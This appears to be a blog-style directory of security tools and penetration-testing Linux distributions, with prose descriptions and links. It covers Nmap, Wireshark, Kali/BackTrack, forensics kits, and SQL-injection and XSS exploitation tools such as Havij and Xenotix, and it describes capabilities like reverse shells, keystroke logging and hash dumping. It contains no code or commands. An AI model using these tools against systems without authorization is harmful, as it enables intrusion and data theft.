Years ago there was a website called astalavista.box.sk. This website was a hub for security tools and learning. Unfortunately this website no longer exists. This made me very sad so I decided to compile a list of available tools for those interested in moving their knowledge of security further. I have not been able to test every tool or OS included within this list but I have researched each one, and their reputations. If they aren’t worthy then I would not have listed them. These are in no particular order. Use at your own risk and do not use for malicious purposes unless you are attacking your own system or you have consent to do so to someone else’. I will not be held responsible for any result of your use of these tools. Again, use at your own risk as some of these tools can result in criminal prosecution. Please review my Terms of Service before utilizing any of the resources found on this page.
NMAP (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. NMAP uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. NMAP runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line NMAP executable, the NMAP suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (NPing). for more information and to download NMAP visit http://nmap.org/
Snort can perform protocol analysis and content searching/matching. It can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. For more information or to download Snort visit – http://snort.org/snort
Wireshark – Calling itself “the de facto (and often de jure) standard” for network protocol analysis. It performs deep inspection of hundreds of protocols and, unlike many of the similar commercial products, it works on multiple platforms. Operating System: Windows, Linux, OS X. For more information visit – http://www.wireshark.org
>Back to top<
Operating Systems loaded with tools and goodies.
Kali Linux, previously known as “BackTrack Linux”.
BackTrack Linux, is a Linux distribution based on the Debian GNU/Linux distribution with a primary focus on digital forensics and penetration testing. BackTrack includes many integrated security tools and is named after a search algorithm called ‘backtracking’. For more information or to download BackTrack Linux visit http://www.backtrack-linux.org/. BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools. BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pen-testing distro that is fast and easy to use. BackBox does have a pretty concise looking desktop environment and seems to work very well. Like the other distros BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through repositories. BackBox has all the usual suspect for Forensic Analysis, Documentation & Reporting and Reverse Engineering with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.
PHLAK (Professional Hacker’s Linux Assault Kit) – PHLAK (Professional Hacker’s Linux Assault Kit) is a modular security distribution, geared to be used as a live CD. PHLAK was created to become the only tool security professionals would need to perform security analysis, penetration testing, forensics, and security auditing. PHLAK comes with two light GUIs (fluxbox and XFCE4), packages for printing, publishing, a little multimedia, many security tools, and a file cabinet full of security related documentation for your reading/educational purposes. This distro is based off of Morphix. http://www.phlak.org/ Inside Security Rescue Toolkit – INSERT is a complete, bootable linux system. It comes with a graphical user interface running the fluxbox window manager while still being sufficiently small to fit on a credit card-sized CD-ROM. http://www.inside-security.de/insert_en.html
IPFire – IPFire was designed with both modularity and a high-level of flexibility in mind. You can easily deploy many variations of it, such as a firewall, a proxy server or a VPN gateway. The modular design ensures that it runs exactly what you’ve configured it for and nothing more. Everything is simple to manage and update through the package manager, making maintenance a breeze. Homepage – http://www.ipfire.org/
NetSecL is a hardened,live and installable OS based on OpenSuse suitable for Desktop/Server and Penetration testing. Once installed you can fully enjoy the features of GrSecurity hardened kernel and penetration tools OR use the penetration tools directly from your live DVD. GrSecurity is a great security enhancement that you can enjoy with NetSecL and have a normally functional OS together with the NetSecL Firewall and Penetration tools you are always ready and know at what level your security is. http://netsecl.com/
Openwall GNU/Linux (OWL) Openwall GNU/Linux (OWL) is a small, security-enhanced distribution suitable for virtual appliances, hardware appliances, and physical servers. OWL is binary compatible with Red Hat Enterprise Linux. OWL is also a distribution used by many security professionals for security penetration testing and password cracking. Openwall also develops other security products such as the famous John the Ripper password crack utility, phpass, passwdqc, and tcb. http://www.openwall.com/Owl/ WEAKERTH4N – This penetration distribution is built from Debian Squeeze and uses Fluxbox for its’ desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many Wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing, Android Hacking, Networking and Shells.
Bugtraq – Some of the special features included with Bugtraq include (as stated) an expanded range of recognition for injection wireless drivers, (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc. Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease, of deleting tracks and backdoors. Just by having read about Bugtraq I’m really glad that I can add this to the list because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Buqtraq: Malware, Penetration Shield, Web audit, Brute force attack, Comunication, Forensics Analitycs, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerabilty detection.
NodeZero – Like BackTrack, NodeZero is an Ubuntu based distro used for penetration testing using repositories so every time Ubuntu releases a patch for its bugs, you also are notified for system updates or upgrades. Node Zero used to be famous for its inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these tools. Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) state that the distros real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable linux environment. Sounds cool. Ever tried it? Let us know in the comments below.
Samurai Webtesting Framework – This is a live linux distro that has been pre-configured with some of the best of open source and free tools that focus on testing and attacking websites. (The difference with Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) websites. The developers outline four steps of a web pen-test. The Samurai Web Testing Framework is a live linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment” – i.e. so you can ethical hack without violating any laws. This is a pentesting distro recommended for penetration testers who wants to combine network and web app techniques. Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a Hardened Kernel with aufs patches, Backported Wifi stack from latest stable kernel release, Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support with development tools.
Lightweight Portable Security – Distributed by the US Department of Defense, Lightweight Portable Security (LPS) creates a secure end node from trusted media on almost any Intel-based computer (PC or Mac). LPS boots a thin Linux operating system from a CD or USB flash stick without mounting a local hard drive. Administrator privileges are not required; nothing is installed. The LPS family was created to address particular use cases: LPS-Public is a safer, general-purpose solution for using web-based applications. The accreditedLPS-Remote Access is only for accessing your organization’s private network. Homepage – http://spi.dod.mil/lipose.htm
Matriux Krypton – There are 300 security tools to work, called “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.
Blackbuntu is another penetration testing distro based on Ubuntu obviously because of its name. It uses GNOME as its DE and uses the Ubuntu 10.10 release. The categories of its tools include Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VOIP Analysis, Digital Forensic, Reverse Engineering and other Miscellaneous tools like macchanger and lynis auditing tools. Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu.
Here is a list of Security and Penetration Testing tools – or rather categories available within the Blackbuntu package, (each category has many sub categories) but this gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellanious section. This list is hardly revolutionary but the tools contained within might be different to the other distros.
deft – DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards Computer Forensics and uses LXDE as desktop environment and WINE for executing Windows tools under Linux. The developers, (based in Italy) hope that their distro will be used by the Military, Police, Investigators, IT Auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit” Knoppix STD – As the name suggests this distribution is based on Knoppix and STD stands for Security Tools Distribution. This distribution didn’t get any update (like most pen-test distros) in a long time and might not work on some new hardwares but they have a fairly good collection of tools. fluxbox is used for desktop environment. Peento is a smart and well equipped linux distro with various tools, based on Gentoo.It’s basically a gentoo install with lots of customized tools, customized kernel, and tons more. This distro is based on Debian and originated in Germany. The architecture is i486 and runs from the following desktops: GNOME, KDE, LXDE and also Openbox.
Knoppix has been around for a long time now – in fact I think it was one of the original live distros. Knoppix is primarily designed to be used as a Live CD, it can also be installed on a hard disk. The STD in the Knoppix name stands for Security Tools Distribution. The Cryptography section is particularly well-known in Knoppix.
CAINE Stands for Computer Aided Investigative Environment, and like many information security products and tools – it is Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools that are composed as software modules, all displayed within a friendly graphical interface. CAINE states to have three objectives. These are, to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation. Secondly that the distro has a user friendly graphical interface and finally that it provides a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open-source.
Trinity Rescue Kit – Trinity Rescue Kit or TRK is a free live Linux distribution that aims specifically at recovery and repair operations on Windows machines, but is equally usable for Linux recovery issues. Since version 3.4 it has an easy to use scrollable text menu that allows anyone who masters a keyboard and some English to perform maintenance and repair on a computer, ranging from password resetting over disk cleanup to virus scanning. Homepage – http://trinityhome.org/
Damn Vulnerable Linux (DVL) – Damn Vulnerable Linux (DVL) is a Slackware and Slax-based live DVD. The distribution, purposefully stuffed with broken, ill-configured, outdated and exploitable software, began life as a training system used during the author’s university lectures. Its primary goal is to design a Linux system that is as vulnerable as possible — in order to teach and demonstrate a variety of security topics, including reverse code engineering, buffer overflows, shell code development, web exploitation, and SQL injection.
Vyatta – The free community Vyatta Core software(VC) is an award-winning open source network operating system providing advanced IPv4 and IPv6 routing, stateful firewalling, IPSec and SSL OpenVPN, and more. When you add Vyatta to a standard x86 hardware system, you can create an enterprise grade network appliance that easily scales from DSL to 10Gbps. Vyatta is also optimized to run in VMware, Citrix XenServer, Xen, KVM, and Hyper V, providing networking and security services to virtual machines and cloud computing environments. Vyatta has been downloaded over 1,000,000 times, has a community of hundreds of thousands of registered users and counts dozens of fortune 500 businesses among its commercial customers. http://www.vyatta.org
Wireless network tools.
Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic (devices and drivers permitting). For more information on Kismet visit http://www.kismetwireless.net/index.shtml
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. For more information or to download visit – http://www.cirt.net/
Bluepot – Bluetooth honeypot Spooftooph – Spoofs or clones Bluetooth devices Smartphone-Pentest-Framework Fern-Wifi-cracker – Gui for testing Wireless encryption strength Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump Wifite – Automated wireless auditor Blueranger – Uses link quality to locate Bluetooth devices Netgear-telnetable – Enables Telnet console on Netgear devices >Back to top< Security Utilities. WinSCP – Secure file transfer client for Windows. More info can be found here – http://winscp.net/eng/docs/free_sftp_client_for_windows
BleachBit – Erases the traces of your actions on your computer and speeds up performance by cleaning up your cache, deleting your history, and more. It can also “shred” files or folders so they can’t be recovered from your hard drive. Operating System: Windows, Linux. Home page @ http://bleachbit.sourceforge.net
Eraser – Even though you’ve deleted a file, someone may be able to recover it from your hard drive using forensics tools. However, Eraser writes over your old files, completely eliminating all traces of sensitive or personal files. Operating System: Windows. Details can be found here – http://www.heidi.ie/eraser
TrueCrypt – Like the PGP product, TrueCrypt can protect your entire hard drive or thumb drive. Incredibly popular. Operating System: Windows. For more info and to download visit here – http://www.truecrypt.org
File System Forensics
Odessa – Short for “Open Digital Evidence Search and Seizure Architecture,” ODESSA, incorporates a variety of tools for collecting and analyzing digital evidence. Still good for analyzation of Internet Explorer cookies and some Windows files. Available for Windows, Linux, OS X. More info can be found here – http://odessa.sourceforge.net
The Sleuth Kit – The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate disk images. The core functionality of TSK allows you to analyze volume and file system data. The plug-in framework allows you to incorporate additional modules to analyze file contents and build automated systems. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence. More info on The Sleuth Kit can be found here – http://www.sleuthkit.org/sleuthkit/
AFICK (Another File Integrity Checker) – Afick is a security tool, very close from the well known tripwire. It allows to monitor the changes on your files systems, and so can detect intrusions. http://afick.sourceforge.net/
Ophcrack – Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms. More info on Ophcrack can be found here – http://ophcrack.sourceforge.net/ >Back to top<
Server Exploitation Tools
Xenotix XSS Exploit Framework – Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.
Websploit – Scans & analyses remote systems for vulnerabilities
Htexploit – Tool to bypass standard directory protection
Tnscmd10g – Allows you to inject commands into Oracle
BBQSQL – Blind SQL injection toolkit
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer
Hajiv – Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software one can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
Awesome tutorial for Hajiv found here – http://jameslovecomputers.wordpress.com/category/tutorials/backtrack-tutorials/web-exploitation-tools-backtrack-tutorials/